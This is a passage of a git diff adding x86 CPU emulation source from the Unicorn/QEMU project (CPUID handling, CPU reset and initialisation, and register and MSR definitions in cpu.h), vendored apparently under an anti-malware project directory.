env->features[FEAT_8000_0007_EDX]; + break; + case 0x80000008: + /* virtual & phys address size in low 2 bytes. */ +/* XXX: This value must match the one used in the MMU code. */ + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { + /* 64 bit processor */ +/* XXX: The physical address space is limited to 42 bits in exec.c. */ + *eax = 0x00003028; /* 48 bits virtual, 40 bits physical */ + } else { + if (env->features[FEAT_1_EDX] & CPUID_PSE36) { + *eax = 0x00000024; /* 36 bits physical */ + } else { + *eax = 0x00000020; /* 32 bits physical */ + } + } + *ebx = 0; + *ecx = 0; + *edx = 0; + if (cs->nr_cores * cs->nr_threads > 1) { + *ecx |= (cs->nr_cores * cs->nr_threads) - 1; + } + break; + case 0x8000000A: + if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { + *eax = 0x00000001; /* SVM Revision */ + *ebx = 0x00000010; /* nr of ASIDs */ + *ecx = 0; + *edx = env->features[FEAT_SVM]; /* optional features */ + } else { + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + } + break; + case 0xC0000000: + *eax = env->cpuid_xlevel2; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 0xC0000001: + /* Support for VIA CPU's CPUID instruction */ + *eax = env->cpuid_version; + *ebx = 0; + *ecx = 0; + *edx = env->features[FEAT_C000_0001_EDX]; + break; + case 0xC0000002: + case 0xC0000003: + case 0xC0000004: + /* Reserved for the future, and now filled with zero */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + default: + /* reserved values: zero */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + } +} + +/* CPUClass::reset() */ +static void x86_cpu_reset(CPUState *s) +{ + X86CPU *cpu = X86_CPU(s->uc, s); + X86CPUClass *xcc = X86_CPU_GET_CLASS(s->uc, cpu); + CPUX86State *env = &cpu->env; + int i; + + xcc->parent_reset(s); + + memset(env, 0, offsetof(CPUX86State, cpuid_level)); + + tlb_flush(s, 1); + + env->old_exception = -1; + + /* init to reset state */ + +#ifdef CONFIG_SOFTMMU + env->hflags |= HF_SOFTMMU_MASK; +#endif + env->hflags2 |= 
HF2_GIF_MASK; + + cpu_x86_update_cr0(env, 0x60000010); + env->a20_mask = ~0x0; + env->smbase = 0x30000; + + env->idt.limit = 0xffff; + env->gdt.limit = 0xffff; + env->ldt.limit = 0xffff; + env->ldt.flags = DESC_P_MASK | (2 << DESC_TYPE_SHIFT); + env->tr.limit = 0xffff; + env->tr.flags = DESC_P_MASK | (11 << DESC_TYPE_SHIFT); + + cpu_x86_load_seg_cache(env, R_CS, 0xf000, 0xffff0000, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | + DESC_R_MASK | DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + + env->eip = 0xfff0; + env->regs[R_EDX] = env->cpuid_version; + + env->eflags = 0x2; + + /* FPU init */ + for (i = 0; i < 8; i++) { + env->fptags[i] = 1; + } + cpu_set_fpuc(env, 0x37f); + + env->mxcsr = 0x1f80; + env->xstate_bv = XSTATE_FP | XSTATE_SSE; + + env->pat = 0x0007040600070406ULL; + env->msr_ia32_misc_enable = MSR_IA32_MISC_ENABLE_DEFAULT; + + memset(env->dr, 0, sizeof(env->dr)); + env->dr[6] = DR6_FIXED_1; + env->dr[7] = DR7_FIXED_1; + cpu_breakpoint_remove_all(s, BP_CPU); + cpu_watchpoint_remove_all(s, BP_CPU); + + env->xcr0 = 1; + + /* + * SDM 11.11.5 requires: + * - IA32_MTRR_DEF_TYPE MSR.E = 0 + * - IA32_MTRR_PHYSMASKn.V = 0 + * All other bits are undefined. For simplification, zero it all. + */ + env->mtrr_deftype = 0; + memset(env->mtrr_var, 0, sizeof(env->mtrr_var)); + memset(env->mtrr_fixed, 0, sizeof(env->mtrr_fixed)); + +#if !defined(CONFIG_USER_ONLY) + /* We hard-wire the BSP to the first CPU. 
*/ + if (s->cpu_index == 0) { + apic_designate_bsp(env->uc, cpu->apic_state); + } + + s->halted = !cpu_is_bsp(cpu); +#endif +} + +#ifndef CONFIG_USER_ONLY +bool cpu_is_bsp(X86CPU *cpu) +{ + return (cpu_get_apic_base((&cpu->env)->uc, cpu->apic_state) & MSR_IA32_APICBASE_BSP) != 0; +} +#endif + +static void mce_init(X86CPU *cpu) +{ + CPUX86State *cenv = &cpu->env; + unsigned int bank; + + if (((cenv->cpuid_version >> 8) & 0xf) >= 6 + && (cenv->features[FEAT_1_EDX] & (CPUID_MCE | CPUID_MCA)) == + (CPUID_MCE | CPUID_MCA)) { + cenv->mcg_cap = MCE_CAP_DEF | MCE_BANKS_DEF; + cenv->mcg_ctl = ~(uint64_t)0; + for (bank = 0; bank < MCE_BANKS_DEF; bank++) { + cenv->mce_banks[bank * 4] = ~(uint64_t)0; + } + } +} + +#ifndef CONFIG_USER_ONLY +static void x86_cpu_apic_create(X86CPU *cpu, Error **errp) +{ +#if 0 + DeviceState *dev = DEVICE(cpu); + APICCommonState *apic; + const char *apic_type = "apic"; + + cpu->apic_state = qdev_try_create(qdev_get_parent_bus(dev), apic_type); + if (cpu->apic_state == NULL) { + error_setg(errp, "APIC device '%s' could not be created", apic_type); + return; + } + + object_property_add_child(OBJECT(cpu), "apic", + OBJECT(cpu->apic_state), NULL); + //qdev_prop_set_uint8(cpu->apic_state, "id", env->cpuid_apic_id); + /* TODO: convert to link<> */ + apic = APIC_COMMON(cpu->apic_state); + apic->cpu = cpu; +#endif +} + +static void x86_cpu_apic_realize(X86CPU *cpu, Error **errp) +{ + if (cpu->apic_state == NULL) { + return; + } + + if (qdev_init(cpu->apic_state)) { + error_setg(errp, "APIC device '%s' could not be initialized", + object_get_typename(OBJECT(cpu->apic_state))); + return; + } +} +#else +static void x86_cpu_apic_realize(X86CPU *cpu, Error **errp) +{ +} +#endif + + +#define IS_INTEL_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_INTEL_1 && \ + (env)->cpuid_vendor2 == CPUID_VENDOR_INTEL_2 && \ + (env)->cpuid_vendor3 == CPUID_VENDOR_INTEL_3) +#define IS_AMD_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_AMD_1 && \ + (env)->cpuid_vendor2 == 
CPUID_VENDOR_AMD_2 && \ + (env)->cpuid_vendor3 == CPUID_VENDOR_AMD_3) +static int x86_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cs = CPU(dev); + X86CPU *cpu = X86_CPU(uc, dev); + X86CPUClass *xcc = X86_CPU_GET_CLASS(uc, dev); + CPUX86State *env = &cpu->env; + Error *local_err = NULL; + + if (env->features[FEAT_7_0_EBX] && env->cpuid_level < 7) { + env->cpuid_level = 7; + } + + /* On AMD CPUs, some CPUID[8000_0001].EDX bits must match the bits on + * CPUID[1].EDX. + */ + if (IS_AMD_CPU(env)) { + env->features[FEAT_8000_0001_EDX] &= ~CPUID_EXT2_AMD_ALIASES; + env->features[FEAT_8000_0001_EDX] |= (env->features[FEAT_1_EDX] + & CPUID_EXT2_AMD_ALIASES); + } + + if (x86_cpu_filter_features(cpu) && cpu->enforce_cpuid) { + error_setg(&local_err, + "TCG doesn't support requested features"); + goto out; + } + +#ifndef CONFIG_USER_ONLY + //qemu_register_reset(x86_cpu_machine_reset_cb, cpu); + + if (cpu->env.features[FEAT_1_EDX] & CPUID_APIC || smp_cpus > 1) { + x86_cpu_apic_create(cpu, &local_err); + if (local_err != NULL) { + goto out; + } + } +#endif + + mce_init(cpu); + if (qemu_init_vcpu(cs)) + return -1; + + x86_cpu_apic_realize(cpu, &local_err); + if (local_err != NULL) { + goto out; + } + cpu_reset(cs); + + xcc->parent_realize(uc, dev, &local_err); +out: + if (local_err != NULL) { + error_propagate(errp, local_err); + return -1; + } + + return 0; +} + +/* Enables contiguous-apic-ID mode, for compatibility */ +static bool compat_apic_id_mode; + +void enable_compat_apic_id_mode(void) +{ + compat_apic_id_mode = true; +} + +/* Calculates initial APIC ID for a specific CPU index + * + * Currently we need to be able to calculate the APIC ID from the CPU index + * alone (without requiring a CPU object), as the QEMU<->Seabios interfaces have + * no concept of "CPU index", and the NUMA tables on fw_cfg need the APIC ID of + * all CPUs up to max_cpus. 
+ */ +uint32_t x86_cpu_apic_id_from_index(unsigned int cpu_index) +{ + uint32_t correct_id; + + correct_id = x86_apicid_from_cpu_idx(smp_cores, smp_threads, cpu_index); + if (compat_apic_id_mode) { + if (cpu_index != correct_id) { + //error_report("APIC IDs set in compatibility mode, " + // "CPU topology won't match the configuration"); + } + return cpu_index; + } else { + return correct_id; + } +} + +static void x86_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + //printf("... X86 initialize (object)\n"); + CPUState *cs = CPU(obj); + X86CPU *cpu = X86_CPU(cs->uc, obj); + X86CPUClass *xcc = X86_CPU_GET_CLASS(uc, obj); + CPUX86State *env = &cpu->env; + + cs->env_ptr = env; + cpu_exec_init(env, opaque); + + object_property_add(obj, "family", "int", + x86_cpuid_version_get_family, + x86_cpuid_version_set_family, NULL, NULL, NULL); + object_property_add(obj, "model", "int", + x86_cpuid_version_get_model, + x86_cpuid_version_set_model, NULL, NULL, NULL); + object_property_add(obj, "stepping", "int", + x86_cpuid_version_get_stepping, + x86_cpuid_version_set_stepping, NULL, NULL, NULL); + object_property_add(obj, "level", "int", + x86_cpuid_get_level, + x86_cpuid_set_level, NULL, NULL, NULL); + object_property_add(obj, "xlevel", "int", + x86_cpuid_get_xlevel, + x86_cpuid_set_xlevel, NULL, NULL, NULL); + object_property_add_str(obj, "vendor", + x86_cpuid_get_vendor, + x86_cpuid_set_vendor, NULL); + object_property_add_str(obj, "model-id", + x86_cpuid_get_model_id, + x86_cpuid_set_model_id, NULL); + object_property_add(obj, "tsc-frequency", "int", + x86_cpuid_get_tsc_freq, + x86_cpuid_set_tsc_freq, NULL, NULL, NULL); + object_property_add(obj, "apic-id", "int", + x86_cpuid_get_apic_id, + x86_cpuid_set_apic_id, NULL, NULL, NULL); + object_property_add(obj, "feature-words", "X86CPUFeatureWordInfo", + x86_cpu_get_feature_words, + NULL, NULL, (void *)env->features, NULL); + object_property_add(obj, "filtered-features", "X86CPUFeatureWordInfo", + 
x86_cpu_get_feature_words, + NULL, NULL, (void *)cpu->filtered_features, NULL); + + cpu->hyperv_spinlock_attempts = HYPERV_SPINLOCK_NEVER_RETRY; + env->cpuid_apic_id = x86_cpu_apic_id_from_index(cs->cpu_index); + + x86_cpu_load_def(cpu, xcc->cpu_def, &error_abort); + + /* init various static tables used in TCG mode */ + if (tcg_enabled(env->uc)) + optimize_flags_init(env->uc); +} + +static int64_t x86_cpu_get_arch_id(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + return env->cpuid_apic_id; +} + +static bool x86_cpu_get_paging_enabled(const CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + + return (cpu->env.cr[0] & CR0_PG_MASK) != 0; +} + +static void x86_cpu_set_pc(CPUState *cs, vaddr value) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + + cpu->env.eip = value; +} + +static void x86_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + + cpu->env.eip = tb->pc - tb->cs_base; +} + +static bool x86_cpu_has_work(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + +#if !defined(CONFIG_USER_ONLY) + if (cs->interrupt_request & CPU_INTERRUPT_POLL) { + apic_poll_irq(cpu->apic_state); + cpu_reset_interrupt(cs, CPU_INTERRUPT_POLL); + } +#endif + + return ((cs->interrupt_request & CPU_INTERRUPT_HARD) && + (env->eflags & IF_MASK)) || + (cs->interrupt_request & (CPU_INTERRUPT_NMI | + CPU_INTERRUPT_INIT | + CPU_INTERRUPT_SIPI | + CPU_INTERRUPT_MCE)); +} + +static void x86_cpu_common_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + //printf("... 
init X86 cpu common class\n"); + X86CPUClass *xcc = X86_CPU_CLASS(uc, oc); + CPUClass *cc = CPU_CLASS(uc, oc); + DeviceClass *dc = DEVICE_CLASS(uc, oc); + + xcc->parent_realize = dc->realize; + dc->realize = x86_cpu_realizefn; + dc->bus_type = TYPE_ICC_BUS; + + xcc->parent_reset = cc->reset; + cc->reset = x86_cpu_reset; + cc->reset_dump_flags = CPU_DUMP_FPU | CPU_DUMP_CCOP; + + cc->class_by_name = x86_cpu_class_by_name; + cc->parse_features = x86_cpu_parse_featurestr; + cc->has_work = x86_cpu_has_work; + cc->do_interrupt = x86_cpu_do_interrupt; + cc->cpu_exec_interrupt = x86_cpu_exec_interrupt; + cc->dump_state = x86_cpu_dump_state; + cc->set_pc = x86_cpu_set_pc; + cc->synchronize_from_tb = x86_cpu_synchronize_from_tb; + cc->get_arch_id = x86_cpu_get_arch_id; + cc->get_paging_enabled = x86_cpu_get_paging_enabled; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = x86_cpu_handle_mmu_fault; +#else + cc->get_memory_mapping = x86_cpu_get_memory_mapping; + cc->get_phys_page_debug = x86_cpu_get_phys_page_debug; +#endif +#ifndef CONFIG_USER_ONLY + cc->debug_excp_handler = breakpoint_handler; +#endif + cc->cpu_exec_enter = x86_cpu_exec_enter; + cc->cpu_exec_exit = x86_cpu_exec_exit; +} + +void x86_cpu_register_types(void *opaque) +{ + const TypeInfo x86_cpu_type_info = { + TYPE_X86_CPU, + TYPE_CPU, + + sizeof(X86CPUClass), + sizeof(X86CPU), + opaque, + + x86_cpu_initfn, + NULL, + NULL, + + NULL, + + x86_cpu_common_class_init, + NULL, + NULL, + + true, + }; + + //printf("... register X86 cpu\n"); + int i; + + type_register_static(opaque, &x86_cpu_type_info); + for (i = 0; i < ARRAY_SIZE(builtin_x86_defs); i++) { + x86_register_cpudef_type(opaque, &builtin_x86_defs[i]); + } + //printf("... 
END OF register X86 cpu\n"); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.h new file mode 100644 index 0000000..0088730 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.h @@ -0,0 +1,1386 @@ +/* + * i386 virtual CPU header + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#ifndef CPU_I386_H +#define CPU_I386_H + +#include "config.h" +#include "qemu-common.h" + +#ifdef TARGET_X86_64 +#define TARGET_LONG_BITS 64 +#else +#define TARGET_LONG_BITS 32 +#endif + +/* target supports implicit self modifying code */ +#define TARGET_HAS_SMC +/* support for self modifying code even if the modified instruction is + close to the modifying instruction */ +#define TARGET_HAS_PRECISE_SMC + +#define TARGET_HAS_ICE 1 + +#ifdef TARGET_X86_64 +#define ELF_MACHINE EM_X86_64 +#define ELF_MACHINE_UNAME "x86_64" +#else +#define ELF_MACHINE EM_386 +#define ELF_MACHINE_UNAME "i686" +#endif + +#define CPUArchState struct CPUX86State + +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define R_EAX 0 +#define R_ECX 1 +#define R_EDX 2 +#define R_EBX 3 +#define R_ESP 4 +#define R_EBP 5 +#define R_ESI 6 +#define R_EDI 7 + +#define R_AL 0 +#define R_CL 1 +#define R_DL 2 +#define R_BL 3 +#define R_AH 4 +#define R_CH 5 +#define R_DH 6 +#define R_BH 7 + +#define R_ES 0 +#define R_CS 1 +#define R_SS 2 +#define R_DS 3 +#define R_FS 4 +#define R_GS 5 + +/* segment descriptor fields */ +#define DESC_G_MASK (1 << 23) +#define DESC_B_SHIFT 22 +#define DESC_B_MASK (1 << DESC_B_SHIFT) +#define DESC_L_SHIFT 21 /* x86_64 only : 64 bit code segment */ +#define DESC_L_MASK (1 << DESC_L_SHIFT) +#define DESC_AVL_MASK (1 << 20) +#define DESC_P_MASK (1 << 15) +#define DESC_DPL_SHIFT 13 +#define DESC_DPL_MASK (3 << DESC_DPL_SHIFT) +#define DESC_S_MASK (1 << 12) +#define DESC_TYPE_SHIFT 8 +#define DESC_TYPE_MASK (15 << DESC_TYPE_SHIFT) +#define DESC_A_MASK (1 << 8) + +#define DESC_CS_MASK (1 << 11) /* 1=code segment 0=data segment */ +#define DESC_C_MASK (1 << 10) /* code: conforming */ +#define DESC_R_MASK (1 << 9) /* code: readable */ + +#define DESC_E_MASK (1 << 10) /* data: expansion direction */ +#define DESC_W_MASK (1 << 9) /* data: writable */ + +#define DESC_TSS_BUSY_MASK (1 << 9) + +/* eflags masks */ +#define CC_C 0x0001 +#define CC_P 0x0004 +#define CC_A 
0x0010 +#define CC_Z 0x0040 +#define CC_S 0x0080 +#define CC_O 0x0800 + +#define TF_SHIFT 8 +#define IOPL_SHIFT 12 +#define VM_SHIFT 17 + +#define TF_MASK 0x00000100 +#define IF_MASK 0x00000200 +#define DF_MASK 0x00000400 +#define IOPL_MASK 0x00003000 +#define NT_MASK 0x00004000 +#define RF_MASK 0x00010000 +#define VM_MASK 0x00020000 +#define AC_MASK 0x00040000 +#define VIF_MASK 0x00080000 +#define VIP_MASK 0x00100000 +#define ID_MASK 0x00200000 + +/* hidden flags - used internally by qemu to represent additional cpu + states. Only the INHIBIT_IRQ, SMM and SVMI are not redundant. We + avoid using the IOPL_MASK, TF_MASK, VM_MASK and AC_MASK bit + positions to ease oring with eflags. */ +/* current cpl */ +#define HF_CPL_SHIFT 0 +/* true if soft mmu is being used */ +#define HF_SOFTMMU_SHIFT 2 +/* true if hardware interrupts must be disabled for next instruction */ +#define HF_INHIBIT_IRQ_SHIFT 3 +/* 16 or 32 segments */ +#define HF_CS32_SHIFT 4 +#define HF_SS32_SHIFT 5 +/* zero base for DS, ES and SS : can be '0' only in 32 bit CS segment */ +#define HF_ADDSEG_SHIFT 6 +/* copy of CR0.PE (protected mode) */ +#define HF_PE_SHIFT 7 +#define HF_TF_SHIFT 8 /* must be same as eflags */ +#define HF_MP_SHIFT 9 /* the order must be MP, EM, TS */ +#define HF_EM_SHIFT 10 +#define HF_TS_SHIFT 11 +#define HF_IOPL_SHIFT 12 /* must be same as eflags */ +#define HF_LMA_SHIFT 14 /* only used on x86_64: long mode active */ +#define HF_CS64_SHIFT 15 /* only used on x86_64: 64 bit code segment */ +#define HF_RF_SHIFT 16 /* must be same as eflags */ +#define HF_VM_SHIFT 17 /* must be same as eflags */ +#define HF_AC_SHIFT 18 /* must be same as eflags */ +#define HF_SMM_SHIFT 19 /* CPU in SMM mode */ +#define HF_SVME_SHIFT 20 /* SVME enabled (copy of EFER.SVME) */ +#define HF_SVMI_SHIFT 21 /* SVM intercepts are active */ +#define HF_OSFXSR_SHIFT 22 /* CR4.OSFXSR */ +#define HF_SMAP_SHIFT 23 /* CR4.SMAP */ + +#define HF_CPL_MASK (3 << HF_CPL_SHIFT) +#define HF_SOFTMMU_MASK (1 << 
HF_SOFTMMU_SHIFT) +#define HF_INHIBIT_IRQ_MASK (1 << HF_INHIBIT_IRQ_SHIFT) +#define HF_CS32_MASK (1 << HF_CS32_SHIFT) +#define HF_SS32_MASK (1 << HF_SS32_SHIFT) +#define HF_ADDSEG_MASK (1 << HF_ADDSEG_SHIFT) +#define HF_PE_MASK (1 << HF_PE_SHIFT) +#define HF_TF_MASK (1 << HF_TF_SHIFT) +#define HF_MP_MASK (1 << HF_MP_SHIFT) +#define HF_EM_MASK (1 << HF_EM_SHIFT) +#define HF_TS_MASK (1 << HF_TS_SHIFT) +#define HF_IOPL_MASK (3 << HF_IOPL_SHIFT) +#define HF_LMA_MASK (1 << HF_LMA_SHIFT) +#define HF_CS64_MASK (1 << HF_CS64_SHIFT) +#define HF_RF_MASK (1 << HF_RF_SHIFT) +#define HF_VM_MASK (1 << HF_VM_SHIFT) +#define HF_AC_MASK (1 << HF_AC_SHIFT) +#define HF_SMM_MASK (1 << HF_SMM_SHIFT) +#define HF_SVME_MASK (1 << HF_SVME_SHIFT) +#define HF_SVMI_MASK (1 << HF_SVMI_SHIFT) +#define HF_OSFXSR_MASK (1 << HF_OSFXSR_SHIFT) +#define HF_SMAP_MASK (1 << HF_SMAP_SHIFT) + +/* hflags2 */ + +#define HF2_GIF_SHIFT 0 /* if set CPU takes interrupts */ +#define HF2_HIF_SHIFT 1 /* value of IF_MASK when entering SVM */ +#define HF2_NMI_SHIFT 2 /* CPU serving NMI */ +#define HF2_VINTR_SHIFT 3 /* value of V_INTR_MASKING bit */ + +#define HF2_GIF_MASK (1 << HF2_GIF_SHIFT) +#define HF2_HIF_MASK (1 << HF2_HIF_SHIFT) +#define HF2_NMI_MASK (1 << HF2_NMI_SHIFT) +#define HF2_VINTR_MASK (1 << HF2_VINTR_SHIFT) + +#define CR0_PE_SHIFT 0 +#define CR0_MP_SHIFT 1 + +#define CR0_PE_MASK (1U << 0) +#define CR0_MP_MASK (1U << 1) +#define CR0_EM_MASK (1U << 2) +#define CR0_TS_MASK (1U << 3) +#define CR0_ET_MASK (1U << 4) +#define CR0_NE_MASK (1U << 5) +#define CR0_WP_MASK (1U << 16) +#define CR0_AM_MASK (1U << 18) +#define CR0_PG_MASK (1U << 31) + +#define CR4_VME_MASK (1U << 0) +#define CR4_PVI_MASK (1U << 1) +#define CR4_TSD_MASK (1U << 2) +#define CR4_DE_MASK (1U << 3) +#define CR4_PSE_MASK (1U << 4) +#define CR4_PAE_MASK (1U << 5) +#define CR4_MCE_MASK (1U << 6) +#define CR4_PGE_MASK (1U << 7) +#define CR4_PCE_MASK (1U << 8) +#define CR4_OSFXSR_SHIFT 9 +#define CR4_OSFXSR_MASK (1U << CR4_OSFXSR_SHIFT) 
+#define CR4_OSXMMEXCPT_MASK (1U << 10) +#define CR4_VMXE_MASK (1U << 13) +#define CR4_SMXE_MASK (1U << 14) +#define CR4_FSGSBASE_MASK (1U << 16) +#define CR4_PCIDE_MASK (1U << 17) +#define CR4_OSXSAVE_MASK (1U << 18) +#define CR4_SMEP_MASK (1U << 20) +#define CR4_SMAP_MASK (1U << 21) + +#define DR6_BD (1 << 13) +#define DR6_BS (1 << 14) +#define DR6_BT (1 << 15) +#define DR6_FIXED_1 0xffff0ff0 + +#define DR7_GD (1 << 13) +#define DR7_TYPE_SHIFT 16 +#define DR7_LEN_SHIFT 18 +#define DR7_FIXED_1 0x00000400 +#define DR7_LOCAL_BP_MASK 0x55 +#define DR7_MAX_BP 4 +#define DR7_TYPE_BP_INST 0x0 +#define DR7_TYPE_DATA_WR 0x1 +#define DR7_TYPE_IO_RW 0x2 +#define DR7_TYPE_DATA_RW 0x3 + +#define PG_PRESENT_BIT 0 +#define PG_RW_BIT 1 +#define PG_USER_BIT 2 +#define PG_PWT_BIT 3 +#define PG_PCD_BIT 4 +#define PG_ACCESSED_BIT 5 +#define PG_DIRTY_BIT 6 +#define PG_PSE_BIT 7 +#define PG_GLOBAL_BIT 8 +#define PG_PSE_PAT_BIT 12 +#define PG_NX_BIT 63 + +#define PG_PRESENT_MASK (1 << PG_PRESENT_BIT) +#define PG_RW_MASK (1 << PG_RW_BIT) +#define PG_USER_MASK (1 << PG_USER_BIT) +#define PG_PWT_MASK (1 << PG_PWT_BIT) +#define PG_PCD_MASK (1 << PG_PCD_BIT) +#define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) +#define PG_DIRTY_MASK (1 << PG_DIRTY_BIT) +#define PG_PSE_MASK (1 << PG_PSE_BIT) +#define PG_GLOBAL_MASK (1 << PG_GLOBAL_BIT) +#define PG_PSE_PAT_MASK (1 << PG_PSE_PAT_BIT) +#define PG_ADDRESS_MASK 0x000ffffffffff000LL +#define PG_HI_RSVD_MASK (PG_ADDRESS_MASK & ~PHYS_ADDR_MASK) +#define PG_HI_USER_MASK 0x7ff0000000000000LL +#define PG_NX_MASK (1ULL << PG_NX_BIT) + +#define PG_ERROR_W_BIT 1 + +#define PG_ERROR_P_MASK 0x01 +#define PG_ERROR_W_MASK (1 << PG_ERROR_W_BIT) +#define PG_ERROR_U_MASK 0x04 +#define PG_ERROR_RSVD_MASK 0x08 +#define PG_ERROR_I_D_MASK 0x10 + +#define MCG_CTL_P (1ULL<<8) /* MCG_CAP register available */ +#define MCG_SER_P (1ULL<<24) /* MCA recovery/new status bits */ + +#define MCE_CAP_DEF (MCG_CTL_P|MCG_SER_P) +#define MCE_BANKS_DEF 10 + +#define MCG_STATUS_RIPV 
(1ULL<<0) /* restart ip valid */ +#define MCG_STATUS_EIPV (1ULL<<1) /* ip points to correct instruction */ +#define MCG_STATUS_MCIP (1ULL<<2) /* machine check in progress */ + +#define MCI_STATUS_VAL (1ULL<<63) /* valid error */ +#define MCI_STATUS_OVER (1ULL<<62) /* previous errors lost */ +#define MCI_STATUS_UC (1ULL<<61) /* uncorrected error */ +#define MCI_STATUS_EN (1ULL<<60) /* error enabled */ +#define MCI_STATUS_MISCV (1ULL<<59) /* misc error reg. valid */ +#define MCI_STATUS_ADDRV (1ULL<<58) /* addr reg. valid */ +#define MCI_STATUS_PCC (1ULL<<57) /* processor context corrupt */ +#define MCI_STATUS_S (1ULL<<56) /* Signaled machine check */ +#define MCI_STATUS_AR (1ULL<<55) /* Action required */ + +/* MISC register defines */ +#define MCM_ADDR_SEGOFF 0 /* segment offset */ +#define MCM_ADDR_LINEAR 1 /* linear address */ +#define MCM_ADDR_PHYS 2 /* physical address */ +#define MCM_ADDR_MEM 3 /* memory address */ +#define MCM_ADDR_GENERIC 7 /* generic */ + +#define MSR_IA32_TSC 0x10 +#define MSR_IA32_APICBASE 0x1b +#define MSR_IA32_APICBASE_BSP (1<<8) +#define MSR_IA32_APICBASE_ENABLE (1<<11) +#define MSR_IA32_APICBASE_BASE (0xfffff<<12) +#define MSR_IA32_FEATURE_CONTROL 0x0000003a +#define MSR_TSC_ADJUST 0x0000003b +#define MSR_IA32_TSCDEADLINE 0x6e0 + +#define MSR_P6_PERFCTR0 0xc1 + +#define MSR_MTRRcap 0xfe +#define MSR_MTRRcap_VCNT 8 +#define MSR_MTRRcap_FIXRANGE_SUPPORT (1 << 8) +#define MSR_MTRRcap_WC_SUPPORTED (1 << 10) + +#define MSR_IA32_SYSENTER_CS 0x174 +#define MSR_IA32_SYSENTER_ESP 0x175 +#define MSR_IA32_SYSENTER_EIP 0x176 + +#define MSR_MCG_CAP 0x179 +#define MSR_MCG_STATUS 0x17a +#define MSR_MCG_CTL 0x17b + +#define MSR_P6_EVNTSEL0 0x186 + +#define MSR_IA32_PERF_STATUS 0x198 + +#define MSR_IA32_MISC_ENABLE 0x1a0 +/* Indicates good rep/movs microcode on some processors: */ +#define MSR_IA32_MISC_ENABLE_DEFAULT 1 + +#define MSR_MTRRphysBase(reg) (0x200 + 2 * (reg)) +#define MSR_MTRRphysMask(reg) (0x200 + 2 * (reg) + 1) + +#define 
MSR_MTRRphysIndex(addr) ((((addr) & ~1u) - 0x200) / 2) + +#define MSR_MTRRfix64K_00000 0x250 +#define MSR_MTRRfix16K_80000 0x258 +#define MSR_MTRRfix16K_A0000 0x259 +#define MSR_MTRRfix4K_C0000 0x268 +#define MSR_MTRRfix4K_C8000 0x269 +#define MSR_MTRRfix4K_D0000 0x26a +#define MSR_MTRRfix4K_D8000 0x26b +#define MSR_MTRRfix4K_E0000 0x26c +#define MSR_MTRRfix4K_E8000 0x26d +#define MSR_MTRRfix4K_F0000 0x26e +#define MSR_MTRRfix4K_F8000 0x26f + +#define MSR_PAT 0x277 + +#define MSR_MTRRdefType 0x2ff + +#define MSR_CORE_PERF_FIXED_CTR0 0x309 +#define MSR_CORE_PERF_FIXED_CTR1 0x30a +#define MSR_CORE_PERF_FIXED_CTR2 0x30b +#define MSR_CORE_PERF_FIXED_CTR_CTRL 0x38d +#define MSR_CORE_PERF_GLOBAL_STATUS 0x38e +#define MSR_CORE_PERF_GLOBAL_CTRL 0x38f +#define MSR_CORE_PERF_GLOBAL_OVF_CTRL 0x390 + +#define MSR_MC0_CTL 0x400 +#define MSR_MC0_STATUS 0x401 +#define MSR_MC0_ADDR 0x402 +#define MSR_MC0_MISC 0x403 + +#define MSR_EFER 0xc0000080 + +#define MSR_EFER_SCE (1 << 0) +#define MSR_EFER_LME (1 << 8) +#define MSR_EFER_LMA (1 << 10) +#define MSR_EFER_NXE (1 << 11) +#define MSR_EFER_SVME (1 << 12) +#define MSR_EFER_FFXSR (1 << 14) + +#define MSR_STAR 0xc0000081 +#define MSR_LSTAR 0xc0000082 +#define MSR_CSTAR 0xc0000083 +#define MSR_FMASK 0xc0000084 +#define 